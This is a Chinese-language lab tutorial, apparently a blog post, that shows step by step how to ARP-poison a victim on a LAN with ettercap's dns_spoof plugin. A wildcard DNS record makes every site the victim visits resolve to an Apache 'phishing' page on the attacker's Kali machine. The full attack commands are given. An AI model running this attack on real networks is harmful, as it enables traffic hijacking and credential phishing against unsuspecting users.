DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)

DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站
(仅供学习参考)

情景要求:
同一局域网内
受害者IP:192.168.26.130
攻击者系统Kali Linux,IP地址:192.168.26.129
第一步:kali Linux打开apache2服务。
输入打开命令:service apache2 start
查看是否打开命令:service apache2 status
有小绿点就是已经打开了。
DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)_第1张图片
下一步:制作我们的钓鱼网页
命令如下:vi /var/www/html/index.html
有html5基础的小伙伴可制作制作
没有基础的可输入如下代码:





你被黑了。


如图:DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)_第2张图片
输入完成代码退出文本;
切换到受害者机子打开浏览器输入攻击者测试是否成功:
DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)_第3张图片
这些都测试没问题之后,到正题了。我们的目的是让受害者机子输入任何网站都显示我们制作的钓鱼网站。
回到攻击者机子kali linux
输入命令修改ettercap DNS文件;
命令如下:vi /etc/ettercap/etter.dns
修改如图DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)_第4张图片
添加:* A 192.168.26.129(也就是添加攻击者IP)添加完成退出文本;
还差最后一步了,
输入命令:ettercap -i eth0 -T -P dns_spoof -M arp /192.168.26.130///(IP是受害者的)
如图:DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)_第5张图片
然后我们回到受害者机子输入www.baidu.com测试是否跳转到我们制作的钓鱼网页。
如图测试成功:DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)_第6张图片

你可能感兴趣的:(经验总结,dns欺骗)